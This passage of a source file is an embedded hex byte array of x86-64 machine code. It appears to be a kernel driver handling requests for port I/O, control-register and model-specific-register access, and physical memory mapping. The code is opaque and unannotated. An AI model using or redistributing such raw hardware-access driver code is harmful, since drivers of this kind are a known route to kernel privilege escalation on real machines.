0x41, 0x8B, 0x55, 0x00, 0xED, 0x41, 0x89, 0x45, 0x00, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0xBA, 0x2A, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xA9, 0x2A, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x30, 0x83, 0x7A, 0x10, 0x08, 0x72, 0x2A, 0x41, 0x8B, 0x55, 0x00, 0x41, 0x8B, 0x45, 0x04, 0xEE, 0x41, 0xC7, 0x45, 0x00, 0x21, 0x43, 0x65, 0x87, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0x73, 0x2A, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x62, 0x2A, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x31, 0x83, 0x7A, 0x10, 0x08, 0x72, 0x2B, 0x41, 0x8B, 0x55, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x66, 0xEF, 0x41, 0xC7, 0x45, 0x00, 0x21, 0x43, 0x65, 0x87, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0x2B, 0x2A, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x1A, 0x2A, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x30, 0x83, 0x7A, 0x10, 0x08, 0x72, 0x2A, 0x41, 0x8B, 0x55, 0x00, 0x41, 0x8B, 0x45, 0x04, 0xEF, 0x41, 0xC7, 0x45, 0x00, 0x21, 0x43, 0x65, 0x87, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xE9, 0xE4, 0x29, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xD3, 0x29, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xF2, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x14, 0x0F, 0x82, 0xE8, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0x94, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0x90, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x7D, 0x08, 0x41, 0x8B, 0x5D, 0x0C, 0x48, 0xC1, 0xE3, 0x20, 0x41, 0x8B, 0x45, 0x10, 0x48, 0x03, 0xD8, 0x48, 0x89, 0x9C, 0x24, 0xB8, 0x02, 0x00, 0x00, 0x8B, 0xD7, 0x48, 0x8B, 0xB4, 0x24, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xCE, 0xE8, 0x85, 0xF8, 0xFF, 0xFF, 0x48, 0x85, 0xC0, 0x74, 0x32, 0x48, 0x2B, 0x30, 0x48, 0x8B, 0x40, 0x08, 0x4C, 0x8D, 0x04, 0x06, 0x41, 0x8B, 0xD7, 0x89, 0x54, 0x24, 0x6C, 0x3B, 0xD7, 0x73, 0x12, 0x8B, 0xCA, 0x42, 0x0F, 0xB6, 0x04, 0x01, 0x88, 0x04, 0x19, 0xFF, 0xC2, 0x89, 0x54, 0x24, 0x6C, 0xEB, 0xEA, 0x41, 0xC7, 0x45, 0x00, 0x11, 0x11, 0x11, 0x11, 0xEB, 0x4B, 0x48, 0x8B, 0xD7, 0x45, 0x33, 0xC0, 0x48, 0x8B, 0xCE, 0xFF, 0x15, 0x97, 0x37, 0x00, 0x00, 0x45, 0x8B, 0xC7, 0x44, 0x89, 0x7C, 0x24, 0x6C, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00, 0x44, 0x3B, 0xC7, 0x73, 0x14, 0x41, 0x8B, 0xD0, 0x0F, 0xB6, 0x0C, 0x02, 0x88, 0x0C, 0x1A, 0x41, 0xFF, 0xC0, 0x44, 0x89, 0x44, 0x24, 0x6C, 0xEB, 0xE7, 0x48, 0x8B, 0xD7, 0x48, 0x8B, 0xC8, 0xFF, 0x15, 0xE3, 0x36, 0x00, 0x00, 0x41, 0xC7, 0x45, 0x00, 0x22, 0x22, 0x22, 0x22, 0x41, 0x89, 0x5D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xD7, 0x28, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xC6, 0x28, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0x9C, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0x92, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xCC, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0xC8, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x7D, 0x08, 0xBE, 0x04, 0x00, 0x00, 0x00, 0x8B, 0xD6, 0x48, 0x8B, 0x9C, 0x24, 0xC8, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xE8, 0x8A, 0xF7, 0xFF, 0xFF, 0x48, 0x85, 0xC0, 0x74, 0x14, 0x48, 0x2B, 0x18, 0x48, 0x8B, 0x40, 0x08, 0x89, 0x3C, 0x03, 0x41, 0xC7, 0x45, 0x00, 0x11, 0x11, 0x11, 0x11, 0xEB, 0x25, 0x45, 0x33, 0xC0, 0x48, 0x8B, 0xD6, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBA, 0x36, 0x00, 0x00, 0x89, 0x38, 0x48, 0x8B, 0xD6, 0x48, 0x8B, 0xC8, 0xFF, 0x15, 0x2C, 0x36, 0x00, 0x00, 0x41, 0xC7, 0x45, 0x00, 0x22, 0x22, 0x22, 0x22, 0x41, 0x89, 0x7D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x20, 0x28, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x0F, 0x28, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xD3, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0xC9, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x89, 0x84, 0x24, 0xF4, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0xF0, 0x01, 0x00, 0x00, 0x45, 0x8B, 0x65, 0x08, 0x41, 0x8B, 0xD4, 0x48, 0x8B, 0x9C, 0x24, 0xF0, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xE8, 0xD7, 0xF6, 0xFF, 0xFF, 0x48, 0x85, 0xC0, 0x75, 0x68, 0x41, 0x8B, 0xCF, 0x89, 0x8C, 0x24, 0x14, 0x01, 0x00, 0x00, 0x83, 0xF9, 0x20, 0x7D, 0x54, 0x48, 0x63, 0xC1, 0x48, 0x8D, 0x14, 0x40, 0x48, 0x8D, 0xB4, 0xD7, 0x40, 0x61, 0x00, 0x00, 0x83, 0x3E, 0x00, 0x75, 0x35, 0x83, 0xBC, 0xD7, 0x44, 0x61, 0x00, 0x00, 0x00, 0x75, 0x2B, 0x83, 0xBC, 0xD7, 0x50, 0x61, 0x00, 0x00, 0x00, 0x75, 0x21, 0x48, 0x85, 0xF6, 0x74, 0x27, 0x49, 0x8B, 0xD4, 0x45, 0x33, 0xC0, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xDF, 0x35, 0x00, 0x00, 0x48, 0x89, 0x1E, 0x48, 0x89, 0x46, 0x08, 0x44, 0x89, 0x66, 0x10, 0xEB, 0x14, 0xFF, 0xC1, 0x89, 0x8C, 0x24, 0x14, 0x01, 0x00, 0x00, 0xEB, 0xA7, 0x49, 0x8B, 0xC7, 0xEB, 0x04, 0x48, 0x8B, 0x40, 0x08, 0x41, 0x89, 0x45, 0x00, 0x48, 0xC1, 0xE8, 0x20, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x32, 0x27, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x21, 0x27, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xD4, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x0C, 0x0F, 0x82, 0xCA, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x75, 0x00, 0x89, 0xB4, 0x24, 0xAC, 0x01, 0x00, 0x00, 0x45, 0x8B, 0x65, 0x04, 0x44, 0x89, 0xA4, 0x24, 0xA8, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x5D, 0x08, 0x8B, 0xD3, 0x48, 0x8B, 0x8C, 0x24, 0xA8, 0x01, 0x00, 0x00, 0xE8, 0xEC, 0xF5, 0xFF, 0xFF, 0x48, 0x85, 0xC0, 0x75, 0x6C, 0x48, 0x8B, 0xD3, 0x48, 0x8B, 0x0C, 0x25, 0x08, 0x00, 0x00, 0x00, 0xFF, 0x15, 0xAE, 0x34, 0x00, 0x00, 0x45, 0x8B, 0xDF, 0x44, 0x89, 0xBC, 0x24, 0x30, 0x01, 0x00, 0x00, 0x41, 0x83, 0xFB, 0x20, 0x7D, 0x4A, 0x49, 0x63, 0xC3, 0x48, 0x8D, 0x0C, 0x40, 0x44, 0x39, 0xA4, 0xCF, 0x40, 0x61, 0x00, 0x00, 0x75, 0x2C, 0x39, 0xB4, 0xCF, 0x44, 0x61, 0x00, 0x00, 0x75, 0x23, 0x39, 0x9C, 0xCF, 0x50, 0x61, 0x00, 0x00, 0x75, 0x1A, 0x44, 0x89, 0xBC, 0xCF, 0x40, 0x61, 0x00, 0x00, 0x44, 0x89, 0xBC, 0xCF, 0x44, 0x61, 0x00, 0x00, 0x44, 0x89, 0xBC, 0xCF, 0x50, 0x61, 0x00, 0x00, 0xEB, 0x0D, 0x41, 0xFF, 0xC3, 0x44, 0x89, 0x9C, 0x24, 0x30, 0x01, 0x00, 0x00, 0xEB, 0xB0, 0x41, 0xC7, 0x45, 0x00, 0x78, 0x56, 0x34, 0x12, 0x41, 0xC7, 0x45, 0x04, 0x21, 0x43, 0x65, 0x87, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x43, 0x26, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x32, 0x26, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0xB3, 0x00, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x04, 0x0F, 0x82, 0xA9, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x00, 0x85, 0xC0, 0x74, 0x71, 0x83, 0xE8, 0x02, 0x74, 0x3F, 0x83, 0xF8, 0x01, 0x74, 0x0D, 0x41, 0xC7, 0x46, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xE9, 0x85, 0x00, 0x00, 0x00, 0x0F, 0x20, 0xD9, 0x8B, 0xC1, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x45, 0x00, 0x41, 0x89, 0x4D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xEB, 0x58, 0x0F, 0x20, 0xD1, 0x8B, 0xC1, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x45, 0x00, 0x41, 0x89, 0x4D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xEB, 0x2B, 0x0F, 0x20, 0xC1, 0x8B, 0xC1, 0x48, 0xC1, 0xE9, 0x20, 0x41, 0x89, 0x45, 0x00, 0x41, 0x89, 0x4D, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x75, 0x25, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x64, 0x25, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x72, 0x74, 0x83, 0x7A, 0x10, 0x0C, 0x72, 0x6E, 0x41, 0x8B, 0x45, 0x00, 0x41, 0x8B, 0x55, 0x04, 0x41, 0x8B, 0x4D, 0x08, 0x85, 0xC0, 0x74, 0x35, 0x83, 0xF8, 0x03, 0x74, 0x0A, 0x41, 0xC7, 0x46, 0x30, 0x0D, 0x00, 0x00, 0xC0, 0xEB, 0x4A, 0x48, 0xC1, 0xE1, 0x20, 0x48, 0x03, 0xCA, 0x0F, 0x22, 0xD9, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xEB, 0x24, 0x48, 0xC1, 0xE1, 0x20, 0x48, 0x03, 0xCA, 0x0F, 0x22, 0xC1, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xEA, 0x24, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xD9, 0x24, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x10, 0x0F, 0x82, 0x42, 0x02, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x08, 0x0F, 0x82, 0x38, 0x02, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0xF8, 0x00, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0x18, 0x01, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0xF4, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0xF8, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xF4, 0x00, 0x00, 0x00, 0xFF, 0x15, 0xA5, 0x32, 0x00, 0x00, 0x41, 0x8B, 0x5D, 0x00, 0x89, 0x9C, 0x24, 0xF8, 0x01, 0x00, 0x00, 0x44, 0x89, 0xBC, 0x24, 0x2C, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x04, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x05, 0x00, 0x03, 0x00, 0x00, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x28, 0x01, 0x00, 0x00, 0xFF, 0x15, 0xAD, 0x32, 0x00, 0x00, 0x4C, 0x8B, 0xD8, 0x44, 0x8B, 0x60, 0x20, 0x44, 0x89, 0xA4, 0x24, 0x38, 0x02, 0x00, 0x00, 0x8B, 0x80, 0xE0, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x89, 0x84, 0x24, 0x3C, 0x02, 0x00, 0x00, 0x41, 0x8B, 0xBB, 0x80, 0x00, 0x00, 0x00, 0x89, 0xBC, 0x24, 0x40, 0x02, 0x00, 0x00, 0x41, 0x8B, 0xCC, 0x0F, 0xBA, 0xF1, 0x11, 0x41, 0x89, 0x4B, 0x20, 0x41, 0xC7, 0x83, 0xE0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xBE, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0x89, 0xB3, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0x8B, 0x90, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8C, 0x24, 0xFC, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0xD3, 0xED, 0x44, 0x8B, 0xC0, 0x89, 0x44, 0x24, 0x74, 0x41, 0x81, 0xE0, 0xFF, 0xFF, 0xFF, 0x00, 0x44, 0x89, 0x44, 0x24, 0x74, 0x41, 0xBF, 0x00, 0x00, 0xF0, 0xFF, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x45, 0x8B, 0x93, 0x90, 0x00, 0x00, 0x00, 0x45, 0x3B, 0xD7, 0x73, 0x30, 0x41, 0x89, 0xB3, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0x8B, 0x90, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8C, 0x24, 0xFC, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0xD3, 0xED, 0x44, 0x8B, 0xC0, 0x89, 0x44, 0x24, 0x74, 0x41, 0x81, 0xE0, 0xFF, 0xFF, 0xFF, 0x00, 0x44, 0x89, 0x44, 0x24, 0x74, 0x45, 0x8B, 0xD1, 0x0F, 0xB7, 0xD3, 0xED, 0x8B, 0xD0, 0x89, 0x84, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x81, 0xE2, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x94, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xD0, 0x73, 0x0D, 0x81, 0xC2, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x94, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x8B, 0xCA, 0x41, 0x2B, 0xC8, 0x81, 0xF9, 0x98, 0x3A, 0x00, 0x00, 0x72, 0x8B, 0x41, 0x8B, 0xC1, 0x66, 0x0F, 0xEF, 0xFF, 0xF2, 0x48, 0x0F, 0x2A, 0xF8, 0x41, 0x8B, 0xC2, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0xF2, 0x0F, 0x5C, 0xF8, 0x8B, 0xC2, 0x66, 0x0F, 0xEF, 0xF6, 0xF2, 0x48, 0x0F, 0x2A, 0xF0, 0x41, 0x8B, 0xC0, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0xF2, 0x0F, 0x5C, 0xF0, 0x66, 0x0F, 0x2F, 0x35, 0x04, 0x32, 0x00, 0x00, 0x76, 0x17, 0x66, 0x0F, 0x28, 0xC7, 0xF2, 0x0F, 0x59, 0x05, 0xEE, 0x31, 0x00, 0x00, 0xF2, 0x0F, 0x5E, 0xC6, 0xF2, 0x44, 0x0F, 0x5A, 0xC0, 0xEB, 0x04, 0x45, 0x0F, 0x57, 0xC0, 0x45, 0x89, 0x63, 0x20, 0x8B, 0x84, 0x24, 0x30, 0x03, 0x00, 0x00, 0x41, 0x89, 0x83, 0xE0, 0x00, 0x00, 0x00, 0x41, 0x89, 0xBB, 0x80, 0x00, 0x00, 0x00, 0xBA, 0x00, 0x01, 0x00, 0x00, 0x49, 0x8B, 0xCB, 0xFF, 0x15, 0xB0, 0x30, 0x00, 0x00, 0xF3, 0x4D, 0x0F, 0x2C, 0xD8, 0x45, 0x89, 0x5D, 0x00, 0xF2, 0x48, 0x0F, 0x2C, 0xC7, 0x41, 0x89, 0x45, 0x04, 0xF2, 0x48, 0x0F, 0x2C, 0xC6, 0x41, 0x89, 0x45, 0x08, 0x41, 0x89, 0x7D, 0x0C, 0x49, 0xC7, 0x46, 0x38, 0x10, 0x00, 0x00, 0x00, 0x41, 0xC7, 0x46, 0x30, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x8D, 0x22, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x7C, 0x22, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x08, 0x0F, 0x82, 0x2C, 0x01, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x08, 0x0F, 0x82, 0x22, 0x01, 0x00, 0x00, 0x45, 0x8B, 0x4D, 0x00, 0x44, 0x89, 0x8C, 0x24, 0x10, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x4D, 0x04, 0x89, 0x8C, 0x24, 0xA4, 0x00, 0x00, 0x00, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x4C, 0x8B, 0xD0, 0x41, 0x0F, 0xB7, 0xD1, 0xED, 0x44, 0x8B, 0xC0, 0x41, 0x81, 0xE0, 0xFF, 0xFF, 0xFF, 0x00, 0x41, 0x0F, 0xB7, 0xD1, 0xED, 0x89, 0x44, 0x24, 0x3C, 0x25, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x44, 0x24, 0x3C, 0x41, 0x3B, 0xC0, 0x73, 0x09, 0x05, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x44, 0x24, 0x3C, 0x41, 0x2B, 0xC0, 0x3D, 0x98, 0x3A, 0x00, 0x00, 0x72, 0xD6, 0x0F, 0x32, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 0xC2, 0x48, 0x8B, 0xC8, 0x41, 0x0F, 0xB7, 0xD1, 0xED, 0x89, 0x44, 0x24, 0x3C, 0x25, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x44, 0x24, 0x3C, 0x41, 0x3B, 0xC0, 0x73, 0x09, 0x05, 0xFF, 0xFF, 0xFF, 0x00, 0x89, 0x44, 0x24, 0x3C, 0x66, 0x0F, 0xEF, 0xDB, 0xF2, 0x48, 0x0F, 0x2A, 0xD8, 0x41, 0x8B, 0xC0, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC0, 0xF2, 0x0F, 0x5C, 0xD8, 0x66, 0x0F, 0xEF, 0xC0, 0xF2, 0x48, 0x0F, 0x2A, 0xC1, 0x48, 0x85, 0xC9, 0x79, 0x0E, 0xF2, 0x0F, 0x10, 0x0D, 0x92, 0x30, 0x00, 0x00, 0xF2, 0x0F, 0x58, 0xC1, 0xEB, 0x08, 0xF2, 0x0F, 0x10, 0x0D, 0x84, 0x30, 0x00, 0x00, 0x66, 0x0F, 0xEF, 0xD2, 0xF2, 0x49, 0x0F, 0x2A, 0xD2, 0x4D, 0x85, 0xD2, 0x79, 0x04, 0xF2, 0x0F, 0x58, 0xD1, 0xF2, 0x0F, 0x5C, 0xC2, 0xF2, 0x0F, 0x5E, 0xC3, 0xF2, 0x0F, 0x5A, 0xC0, 0xF3, 0x0F, 0x59, 0x05, 0x56, 0x30, 0x00, 0x00, 0xF3, 0x0F, 0x11, 0x84, 0x24, 0x04, 0x01, 0x00, 0x00, 0x45, 0x89, 0x7D, 0x00, 0x8B, 0x84, 0x24, 0x04, 0x01, 0x00, 0x00, 0x41, 0x89, 0x45, 0x04, 0x49, 0xC7, 0x46, 0x38, 0x08, 0x00, 0x00, 0x00, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x46, 0x21, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x35, 0x21, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x04, 0x72, 0x6C, 0x83, 0x7A, 0x10, 0x1C, 0x72, 0x66, 0x45, 0x8B, 0x45, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x45, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x45, 0x8B, 0x55, 0x0C, 0x41, 0x8B, 0x4D, 0x10, 0x41, 0x8B, 0x45, 0x14, 0x48, 0xC1, 0xE0, 0x20, 0x45, 0x8B, 0x4D, 0x18, 0x4C, 0x03, 0xC8, 0x89, 0x4C, 0x24, 0x28, 0x44, 0x89, 0x54, 0x24, 0x20, 0x41, 0x8B, 0x55, 0x00, 0xBE, 0x04, 0x00, 0x00, 0x00, 0x8B, 0xCE, 0xFF, 0x15, 0x7B, 0x2E, 0x00, 0x00, 0x41, 0x89, 0x45, 0x00, 0x49, 0x89, 0x76, 0x38, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0xC3, 0x20, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0xB2, 0x20, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x04, 0x72, 0x6C, 0x83, 0x7A, 0x10, 0x1C, 0x72, 0x66, 0x45, 0x8B, 0x45, 0x08, 0x41, 0x83, 0xE0, 0x07, 0x41, 0xC1, 0xE0, 0x05, 0x41, 0x8B, 0x45, 0x04, 0x83, 0xE0, 0x1F, 0x44, 0x0B, 0xC0, 0x45, 0x8B, 0x55, 0x0C, 0x41, 0x8B, 0x4D, 0x10, 0x41, 0x8B, 0x45, 0x14, 0x48, 0xC1, 0xE0, 0x20, 0x45, 0x8B, 0x4D, 0x18, 0x4C, 0x03, 0xC8, 0x89, 0x4C, 0x24, 0x28, 0x44, 0x89, 0x54, 0x24, 0x20, 0x41, 0x8B, 0x55, 0x00, 0xBE, 0x04, 0x00, 0x00, 0x00, 0x8B, 0xCE, 0xFF, 0x15, 0x00, 0x2E, 0x00, 0x00, 0x41, 0x89, 0x45, 0x00, 0x49, 0x89, 0x76, 0x38, 0x45, 0x89, 0x7E, 0x30, 0xEB, 0x0C, 0x4C, 0x8B, 0xB4, 0x24, 0x38, 0x03, 0x00, 0x00, 0x41, 0x89, 0x46, 0x30, 0xE9, 0x40, 0x20, 0x00, 0x00, 0x4D, 0x89, 0x7E, 0x38, 0x41, 0xC7, 0x46, 0x30, 0x23, 0x00, 0x00, 0xC0, 0xE9, 0x2F, 0x20, 0x00, 0x00, 0x83, 0x7A, 0x08, 0x34, 0x0F, 0x82, 0x50, 0x03, 0x00, 0x00, 0x83, 0x7A, 0x10, 0x08, 0x0F, 0x82, 0x46, 0x03, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x4C, 0x8D, 0x84, 0x24, 0x48, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24, 0x40, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x0C, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x13, 0x2E, 0x00, 0x00, 0x45, 0x8B, 0x5D, 0x00, 0x49, 0xC1, 0xE3, 0x20, 0x41, 0x8B, 0x55, 0x04, 0x49, 0x03, 0xD3, 0x48, 0x8D, 